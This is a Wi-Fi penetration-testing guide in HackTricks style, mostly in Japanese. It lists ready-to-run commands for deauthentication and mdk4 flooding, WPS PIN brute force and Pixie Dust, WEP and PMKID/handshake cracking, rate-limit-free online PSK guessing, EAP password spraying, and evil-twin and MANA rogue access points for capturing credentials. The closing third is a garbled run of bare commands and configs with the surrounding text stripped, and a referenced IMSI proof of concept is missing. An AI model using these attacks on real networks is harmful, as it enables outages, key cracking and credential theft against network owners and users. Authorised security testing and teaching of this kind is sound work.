Pentesting Wifi

Tip

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する：HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

• サブスクリプションプランを確認してください！
• **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
• HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。

Wifiの基本コマンド

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

ツール

Hijacker & NexMon (Android 内部の Wi-Fi)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

dockerでairgeddonを実行する

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

出典: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

これは Evil Twin、KARMA、および Known Beacons 攻撃を実行でき、その後 phishing テンプレートを使用してネットワークの実際のパスワードを入手したり、ソーシャルネットワークの認証情報を取得したりします。

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

このツールはWPS/WEP/WPA-PSK攻撃を自動化します。以下を自動で行います：

• インターフェースを monitor mode に設定する
• 利用可能なネットワークをスキャンし、標的を選択できるようにする
• WEP の場合 - WEP攻撃を実行する
• WPA-PSK の場合
• WPS の場合：Pixie dust attack と bruteforce attack を実行する（brute-force attack は長時間かかる可能性があるので注意）。null PIN や database/generated PINs は試さない点に注意。
• AP から PMKID をキャプチャしてクラックしようとする
• ハンドシェイクをキャプチャするために AP のクライアントを deauthenticate しようとする
• PMKID または Handshake が得られた場合、top5000 パスワードを使って bruteforce を試みる

Attacks Summary

• DoS
• Deauthentication/disassociation – 全員（または特定の ESSID/Client）を切断する
• Random fake APs – ネットワークを隠す、スキャナをクラッシュさせる可能性がある
• Overload AP – AP を停止させようとする（通常あまり有用ではない）
• WIDS – IDS を操作する
• TKIP, EAPOL – 一部の AP に対する DoS の特定攻撃
• Cracking
• Crack WEP（複数のツールと手法）
• WPA-PSK
• WPS pin “Brute-Force”
• WPA PMKID bruteforce
• [DoS +] WPA handshake キャプチャ + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin（with or without DoS）
• Open Evil Twin [+ DoS] – captive portal creds をキャプチャしたり、LAN 攻撃を行うのに有用
• WPA-PSK Evil Twin – パスワードを知っている場合、ネットワーク攻撃に有用
• WPA-MGT – 会社の credentials をキャプチャするのに有用
• KARMA, MANA, Loud MANA, Known beacon
• + Open – captive portal creds をキャプチャしたり、LAN 攻撃を行うのに有用
• + WPA – WPA handshakes をキャプチャするのに有用

Open / OWE networks quick notes

• Passive capture on open SSIDs still works with monitor mode and tcpdump:

iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap

• OWE (Opportunistic Wireless Encryption) はステーションごとの鍵交換を行う（no PSK）ため、air フレームは “open” SSIDs 上でも暗号化されます。WPA3-based であるため、802.11w PMF を適用し、偽装された deauth/disassoc フレームをブロックします。
• OWE does not authenticate joiners: anyone can associate, so verify client isolation instead of trusting marketing claims。隔離がない場合、ARP spoofing や responder-style poisoning によるローカル L2 の攻撃は依然として機能します。
• Evil Twin は、より強い信号を出すことで open/OWE SSIDs 上で依然として実行可能です；PMF は単に deauth の近道を排します。被害者が偽造された TLS cert を受け入れると、フルの HTTP(S) MitM が回復します。
• Broadcast poisoning on open guest Wi-Fi は簡単に creds/hashes（LLMNR/NBT-NS/mDNS）を取得できます。See:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

DOS

Deauthentication Packets

説明元 here:.

Deauthentication attacks は、Wi-Fi ハッキングで広く使われる手法で、“management” フレームを偽造して デバイスをネットワークから強制的に切断する ものです。これらの暗号化されていないパケットはクライアントを正当なネットワークからのものと誤認させ、攻撃者が WPA handshakes を収集して cracking に利用したり、ネットワーク接続を持続的に妨害したりすることを可能にします。この手口は単純ながら効果的で、ネットワークセキュリティに重大な影響を与えます。

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 は deauthentication を意味します
• 1 は送信する deauths の数です（必要に応じて複数送信できます）；0 は継続的に送信することを意味します
• -a 00:14:6C:7E:40:80 は access point の MAC address です
• -c 00:0F:B5:34:30:30 は deauthenticate する client の MAC address です；これを省略すると broadcast deauthentication が送信されます（常に動作するとは限りません）
• ath0 は interface name です

Disassociation Packets

Disassociation packets, similar to deauthentication packets, are a type of management frame used in Wi‑Fi networks. These packets serve to sever the connection between a device (such as a ノートパソコン or スマートフォン) and an access point (AP). The primary distinction between disassociation and deauthentication lies in their usage scenarios. While an AP emits deauthentication packets to remove rogue devices explicitly from the network, disassociation packets are typically sent when the AP is undergoing a shutdown, 再起動や移動の際に送信され、接続中のすべてのノードの切断が必要になります。

この攻撃は mdk4(mode “d”) で実行できます：

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

mdk4によるその他のDOS攻撃

詳しくは here.

ATTACK MODE b: Beacon Flooding

clientsにfake APsを表示するためにbeacon framesを送信します。これにより、network scannersやdriversがクラッシュすることもあります！

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

範囲内のすべてのAccess Points (APs)にauthentication framesを送信すると、特に多数のclientsが関与している場合、これらのAPsに過負荷を与える可能性があります。この大量のトラフィックはシステムの不安定化を招き、一部のAPsがフリーズしたりリセットされたりすることがあります。

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing Access Points (APs) は、SSID が正しく表示されるかを確認し、AP の到達範囲を判定します。この手法は、wordlist の有無にかかわらず bruteforcing hidden SSIDs と組み合わせることで、隠されたネットワークを特定してアクセスするのに有効です。

ATTACK MODE m: Michael Countermeasures Exploitation

異なる QoS キューにランダムまたは重複したパケットを送ると、TKIP APs 上で Michael Countermeasures が発動し、AP が約1分間停止することがあります。この手法は効率的な DoS (Denial of Service) 攻撃手段です。

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

APにEAPOL Start framesを大量に送信するとfake sessionsが作成され、APを圧倒して正当なクライアントの接続を妨げます。あるいは、fake EAPOL Logoff messagesを注入してクライアントを強制切断させることもでき、いずれの手法もネットワークサービスを効果的に妨害します。

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: IEEE 802.11s メッシュネットワークに対する攻撃

メッシュネットワークにおけるリンク管理およびルーティングへの様々な攻撃。

ATTACK MODE w: WIDS 混乱

クライアントを複数の WDS ノードや偽の rogue APs にクロス接続することで、Intrusion Detection and Prevention Systems を操作し、混乱や潜在的なシステム悪用を引き起こす可能性があります。

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

多様なパケットソースとパケット操作用の豊富な修飾子セットを備えた packet fuzzer。

Airggedon

Airgeddon は前述の多くの攻撃を提供します:

WPS

WPS (Wi‑Fi Protected Setup) は、WPA や WPA2 Personal で暗号化されたネットワークへのデバイス接続を簡素化し、セットアップの速度と容易さを向上させます。WEP のように容易に破られるセキュリティには効果がありません。WPS は 8 桁の PIN を使用し、前半と後半に分けて検証するため、組み合わせ数が限られており（約 11,000 通り）、ブルートフォース攻撃に脆弱です。

WPS Bruteforce

この攻撃を行う主なツールは 2 つあり、Reaver と Bully です。

• Reaver は WPS に対する堅牢で実用的な攻撃を目的に設計されており、さまざまなアクセスポイントや WPS 実装でテストされています。
• Bully は C で書かれた WPS brute force 攻撃の new implementation です。元の reaver コードに比べ、依存関係が少ない、メモリと CPU のパフォーマンスが向上している、endianness の正しい処理、より堅牢なオプション群などの利点があります。

この攻撃は WPS PIN の脆弱性を突きます。特に最初の 4 桁が個別に露出し、最後の桁がチェックサムとして機能するため、ブルートフォース攻撃が容易になります。しかし、攻撃者の MAC address をブロックするなどのブルートフォース防御があるため、攻撃を継続するには MAC address のローテーションが必要です。

Bully や Reaver のようなツールで WPS PIN を取得すると、攻撃者は WPA/WPA2 の PSK を導出でき、持続的なネットワークアクセスを確保できます。

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

This refined approach targets WPS PINs using known vulnerabilities:

1. Pre-discovered PINs: 均一な WPS PIN を使用することで知られる特定のメーカーに紐づく既知の PIN のデータベースを利用します。このデータベースは、これらのメーカーに対する可能性の高い PIN と MAC-addresses の最初の3オクテットを関連付けています。
2. PIN Generation Algorithms: ComputePIN や EasyBox のようなアルゴリズムを利用し、AP の MAC-address に基づいて WPS PIN を算出します。Arcadyan algorithm はさらに device ID を必要とし、PIN 生成プロセスにもう一層加わります。

WPS Pixie Dust attack

Dominique Bongard は、一部の Access Points (APs) が秘密コード（nonces（E-S1 と E-S2））を生成する際の欠陥を発見しました。これらの nonces を突き止められれば、AP の WPS PIN を破るのは容易になります。AP は、自身が正当なものであり rogue AP ではないことを証明するために、PIN を特定のコード（hash）の中に示します。これらの nonces は、本質的に WPS PIN を収めた「金庫」を解くための「鍵」です。詳しくは here を参照してください。

簡単に言うと、問題は一部の APs が接続プロセス中に PIN を暗号化するための鍵に十分なランダム性を使用していなかったことです。これにより、ネットワーク外部からの推測（offline brute force attack）に対して脆弱になります。

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

デバイスをmonitor modeに切り替えたくない、またはreaverやbullyが問題を起こす場合は、OneShot-Cを試してみてください。このツールはmonitor modeに切り替えずにPixie Dust攻撃を実行できます。

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

設計が不十分なシステムの中には、Null PIN（空または存在しないPIN）でアクセスを許可してしまうものがあり、これはかなり珍しいです。ツールReaverはこの脆弱性のテストが可能ですが、Bullyはできません。

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

提案されたいずれの WPS 攻撃も airgeddon. を使って簡単に実行できます。

• 5 と 6 は your custom PIN（もしあれば）を試すことができます
• 7 と 8 は Pixie Dust attack を実行します
• 13 は NULL PIN をテストできます
• 11 と 12 は recollect the PINs related to the selected AP from available databases を行い、ComputePIN、EasyBox、および任意で Arcadyan を使用して、可能な PINs を generate します（推奨、やってみては？）
• 9 と 10 は every possible PIN をテストします

WEP

なぜ脆弱なのか

• RC4 seed は単に IV (24 bits) + shared key です。IV は cleartext で小さく（2^24）すぐに繰り返すため、同じ IV を持つ ciphertexts は keystream を再利用します。
• 同じ keystream を使用する二つの ciphertexts を XORing すると PlaintextA ⊕ PlaintextB が漏れます；予測可能なヘッダと RC4 KSA のバイアス（FMS）によりキーのバイトに“投票”できます。PTW はこれを ARP トラフィックを用いて最適化し、必要なパケット数を何百万から数万に減らします。
• 整合性は CRC32（線形／非鍵付き）のみなので、攻撃者はビットを反転させてキーなしで CRC32 を再計算でき、IV を待つ間に packet forgery/replay/ARP injection が可能になります。

実際の解読は決定論的です:

airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met

Airgeddon は、ガイド付き UI を好む場合に備え、“All-in-One” WEP ワークフローをそのまま同梱しています。

WPA/WPA2 PSK

PMKID

In 2018, hashcat revealed a new attack method, unique because it only needs one single packet and doesn’t require any clients to be connected to the target AP—just interaction between the attacker and the AP.

Many modern routers add an optional field to the first EAPOL frame during association, known as Robust Security Network. This includes the PMKID.

As the original post explains, the PMKID is created using known data:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

「PMK Name」が一定で、APとstationのBSSIDが分かっており、PMKがフル4-way handshakeのものと同一であるため、hashcatはこの情報を利用してPSKをクラッキングし、パスフレーズを復元できます！

この情報をgatherしてローカルでパスワードをbruteforceするには、以下を実行します:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

この PMKIDs キャプチャ済み は console に表示され、また 保存 は _ /tmp/attack.pcap_ に行われます
次に、キャプチャを hashcat/john 形式に変換して crack してください:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

正しいハッシュの形式は4つの部分で構成されます。例: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838。あなたのものが3つのみであれば、それは無効です（PMKIDのキャプチャは有効ではありません）。

hcxdumptoolはhandshakesもキャプチャします（次のような表示が出ます: MP:M1M2 RC:63258 EAPOLTIME:17091）。cap2hccapxを使って、handshakesをhashcat/john形式に変換できます。

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

このツールでキャプチャした一部の handshakes は、正しいパスワードを知っていても cracked できないことに気付きました。可能であれば従来の方法でも handshakes をキャプチャするか、このツールで複数回キャプチャすることをお勧めします.

Handshake キャプチャ

WPA/WPA2 ネットワークへの攻撃は、handshake をキャプチャしてパスワードを offline で crack することで実行できます。このプロセスは、特定のネットワークの通信および特定の channel 上の BSSID を監視することを含みます。以下は簡潔なガイドです：

1. ターゲットネットワークの BSSID、channel、および 接続中のクライアント を特定します。
2. 指定した channel と BSSID 上のネットワークトラフィックを監視するために airodump-ng を使用し、handshake をキャプチャできることを期待します。コマンドは次のようになります：

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. ハンドシェイクをキャプチャする確率を高めるため、クライアントを一時的にネットワークから切断して再認証を強制します。これはクライアントにdeauthenticationパケットを送信する aireplay-ng コマンドで行えます:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Note that as the client was deauthenticated it could try to connect to a different AP or, in other cases, to a different network.

airodump-ng に handshake の情報が表示されたら、それは handshake がキャプチャされたことを意味し、listening を停止して構いません:

handshake がキャプチャされたら、aircrack-ng で crack できます:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

ファイルにhandshakeがあるか確認

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

このツールが、完了したhandshakeより先にESSIDの未完了のhandshakeを見つけた場合、有効なものを検出できません。

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

wpa_supplicantのctrl socketを使った高速なオンラインPSK推測（クライアント/PMKIDなし）

クライアントが周囲におらずAPがPMKIDを拒否する場合、supplicantsを再起動することなくオンラインでPSKを反復試行できます：

• wpa_supplicant.cをパッチして、auth failure backoff logic（ssid->auth_failures付近）でdur = 0;を強制し、temporary-disableタイマーを無効化します。
• control socket付きで単一のデーモンを実行します：

# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf

• control interface 経由で実行し、同じ scan と network を再利用する:

ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED

小さなPythonループでソケットイベント（CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED）を読み取ることで、スキャンのオーバーヘッドなしに約5分で約100件の推測を試すことができます。まだノイズが大きく検出されやすいですが、各試行ごとのプロセス再起動やバックオフ遅延を回避できます。

WPA Enterprise (MGT)

企業向けWiFi環境では、さまざまな認証方式に遭遇します。それぞれが異なるセキュリティレベルと管理機能を提供します。airodump-ng のようなツールでネットワークトラフィックを調査すると、これらの認証タイプを示す識別子が表示されることがあります。一般的な方式には次のようなものがあります:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• この方式はハードウェアトークンやワンタイムパスワードをEAP-PEAP内でサポートします。MSCHAPv2とは異なり、peer challengeを使用せず、パスワードをアクセスポイントに平文で送信するため、downgrade attacksのリスクがあります。

2. EAP-MD5 (Message Digest 5):

• クライアントからパスワードのMD5ハッシュを送信します。辞書攻撃に対して脆弱であり、サーバー認証がなく、セッション固有のWEPキーを生成できないため、推奨されません。

3. EAP-TLS (Transport Layer Security):

• クライアント側とサーバー側の両方の証明書を用いて認証を行い、ユーザー単位およびセッション単位の動的なWEPキーを生成して通信を保護できます。

4. EAP-TTLS (Tunneled Transport Layer Security):

• 暗号化されたトンネルを介して相互認証を提供し、動的なユーザー別・セッション別WEPキーを導出する方法を提供します。サーバー側の証明書のみを必要とし、クライアントは資格情報を使用します。

5. PEAP (Protected Extensible Authentication Protocol):

• EAPと同様にTLSトンネルを作成して保護された通信を行います。トンネルによる保護があるため、その上で弱い認証プロトコルを使用することが可能になります。
• PEAP-MSCHAPv2: 通常PEAPと呼ばれ、脆弱なMSCHAPv2のchallenge/response機構をTLSトンネルで保護する組み合わせです。
• PEAP-EAP-TLS (or PEAP-TLS): EAP-TLSに似ていますが、証明書交換の前にTLSトンネルを確立して追加のセキュリティ層を提供します。

You can find more information about these authentication methods here and here.

Username Capture

Reading https://tools.ietf.org/html/rfc3748#page-27 it looks like if you are using EAP the “Identity” messages must be supported, and the username is going to be sent in clear in the “Response Identity” messages.

Even using one of the most secure of authentication methods: PEAP-EAP-TLS, it is possible to capture the username sent in the EAP protocol. To do so, capture a authentication communication (start airodump-ng inside a channel and wireshark in the same interface) and filter the packets byeapol.
Inside the “Response, Identity” packet, the username of the client will appear.

Anonymous Identities

Identity hiding は EAP-PEAP と EAP-TTLS の両方でサポートされています。WiFiネットワークの文脈では、EAP-Identity の要求は通常アソシエーションプロセス中にアクセスポイント (AP) によって開始されます。ユーザーの匿名性を保護するために、ユーザー端末上のEAPクライアントからの応答は、初期 RADIUS サーバーが要求を処理するために必要最低限の情報のみを含みます。以下のシナリオでこの概念を示します:

• EAP-Identity = anonymous
• このシナリオでは、すべてのユーザーが擬名 “anonymous” をユーザー識別子として使用します。初期 RADIUS サーバーは EAP-PEAP または EAP-TTLS サーバーとして機能し、PEAP または TTLS プロトコルのサーバー側を管理します。内部（保護された）認証方式はローカルで処理されるか、リモート（home）RADIUS サーバーに委任されます。
• EAP-Identity = anonymous@realm_x
• この場合、異なる realm に属するユーザーは自分の実際のIDを隠しつつ、どの realm に属するかを示します。これにより初期 RADIUS サーバーは EAP-PEAP または EAP-TTLS のリクエストをそれぞれの home realm の RADIUS サーバーにプロキシでき、home realm のサーバーが PEAP または TTLS サーバーとして振る舞います。初期 RADIUS サーバーは単に RADIUS の中継ノードとして動作します。
• あるいは、初期 RADIUS サーバーが EAP-PEAP または EAP-TTLS サーバーとして動作し、保護された認証方式を処理するか、別のサーバーに転送することもできます。このオプションにより、様々な realm に対して異なるポリシーを設定できます。

EAP-PEAP では、PEAP サーバーと PEAP クライアントの間で TLS トンネルが確立されると、PEAP サーバーは EAP-Identity リクエストを開始し、それを TLS トンネル経由で送信します。クライアントはこの第二の EAP-Identity リクエストに応答し、ユーザーの真の識別子を含む EAP-Identity レスポンスを暗号化トンネル経由で送信します。この方法により、802.11 トラフィックを傍受している第三者に対してユーザーの実際の ID が露呈することを防ぎます。

EAP-TTLS はやや異なる手順に従います。EAP-TTLS では、クライアントは通常 TLS トンネルにより保護された PAP または CHAP を用いて認証します。この場合、クライアントはトンネル確立後に送信される最初の TLS メッセージ内に User-Name 属性と Password または CHAP-Password 属性を含めます。

どのプロトコルを選択しても、PEAP/TTLS サーバーは TLS トンネル確立後にユーザーの真の識別子を取得します。真の識別子は user@realm または単に user として表現されます。PEAP/TTLS サーバーがユーザー認証も担当する場合、サーバーはユーザーの識別子を取得し、TLS トンネルで保護された認証方式を続行します。あるいは、PEAP/TTLS サーバーはユーザーの home RADIUS サーバーに新しい RADIUS リクエストを転送することがあります。この新しい RADIUS リクエストには PEAP または TTLS プロトコル層は含まれません。保護された認証方式が EAP の場合、内部の EAP メッセージは EAP-PEAP または EAP-TTLS のラッパーなしで home RADIUS サーバーに転送されます。送信される RADIUS メッセージの User-Name 属性は、受信 RADIUS リクエストの anonymous User-Name を置き換えてユーザーの真の識別子を含みます。保護された認証方式が PAP または CHAP（TTLS のみサポート）である場合、TLS ペイロードから抽出された User-Name やその他の認証属性が送信側の RADIUS メッセージに差し替えられ、受信 RADIUS リクエストに含まれていた anonymous User-Name と TTLS EAP-Message 属性が置き換えられます。

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM ベースの Wi‑Fi 認証（EAP‑SIM/EAP‑AKA を 802.1X 上で使用する場合）は、導入が擬名/保護された識別子（pseudonyms/protected identities）や内部 EAP の周りの TLS トンネルを実装していない場合、未認証の identity フェーズで恒久的加入者識別子（IMSI）を平文で leak してしまう可能性があります。

Where the leak happens (high level):

• 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
• Authenticator sends EAP-Request/Identity.
• Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
• Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

</details>

注意:
- デプロイが保護された識別子／仮名を用いない素の EAP‑SIM/AKA を使用している場合、TLS トンネルが確立される前に動作します。
- 露出した値は加入者の SIM に結び付いた永続的な識別子であり、収集は長期的な追跡やその先の通信事業者への悪用を可能にします。

影響
- プライバシー: 公共の場所での受動的な Wi‑Fi キャプチャからの持続的なユーザー／デバイス追跡。
- 通信事業者悪用の足がかり: IMSI があれば、SS7/Diameter へアクセスできる攻撃者は位置情報照会や通話/SMS の傍受、MFA の窃取を試みることができます。

緩和策 / 注意点
- クライアントが 3GPP のガイダンス（例: 3GPP TS 33.402）に従い、EAP‑SIM/AKA で匿名の外部識別子（擬名）を使用していることを確認してください。
- 識別フェーズをトンネリングすることを推奨します（例: inner EAP‑SIM/AKA を運ぶ EAP‑TTLS/PEAP）—これにより IMSI が平文で送信されることはありません。
- association/auth のパケットキャプチャに生の IMSI が EAP-Response/Identity に露出していてはなりません。

関連: キャプチャしたモバイル識別子を用いた通信シグナリングの悪用
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

クライアントが**ユーザー名とパスワード**を使用することが想定される場合（なお、この場合**EAP-TLS は有効ではありません**）、**usernames**の**リスト**（次のパート参照）と**passwords**を入手して、[**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.** を使ってアクセスを**bruteforce**してみることができます。
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

apt-get install dnsmasq #Manages DHCP and DNS

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf -d

apt-get install hostapd

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

--negotiate weakest

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5